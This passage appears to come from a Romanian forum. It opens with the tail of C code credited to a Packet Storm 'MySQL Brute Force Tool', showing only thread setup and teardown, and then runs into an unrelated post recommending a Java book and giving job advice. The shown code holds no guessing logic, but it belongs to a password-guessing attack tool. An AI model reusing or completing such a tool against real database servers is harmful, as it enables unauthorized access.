"mysql"; if (args.host == NULL) args.host = "localhost"; thd = malloc(nthreads * sizeof(*thd)); if (!thd) { perror("malloc"); exit(EXIT_FAILURE); } mysql_library_init(0, NULL, NULL); if (pthread_attr_init(&attr) != 0) { perror("pthread_attr_init"); exit(EXIT_FAILURE); } if (pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_JOINABLE) != 0) { perror("pthread_attr_setdetachstate"); exit(EXIT_FAILURE); } for(i=0;i<nthreads;i++) { if (pthread_create(&thd[i], NULL, run, &args) != 0) { perror("pthread_create"); exit(EXIT_FAILURE); } } for(i=0;i<nthreads;i++) { if (pthread_join(thd[i], NULL) != 0) { perror("pthread_join"); exit(EXIT_FAILURE); } } pthread_attr_destroy(&attr); free(thd); mysql_library_end(); return EXIT_SUCCESS; } Sursa: MySQL Brute Force Tool ? Packet Storm

Cauta cartea "Java de la 0 la expert", am vazut-o pe la Diverta parca. Acopera mult din ceea ce inseamna Java si e explicata pas cu pas. Inca o data spun, cred ca e printre cele mai bune carti pe care le-am citit. PS: Sfatul meu e sa nu te angajezi, nu intr-un domeniu despre care nu stii foarte multe pentru ca e posibil sa nu iti placa. Cel mai bine cauti un job cu limbajul de programare care iti place.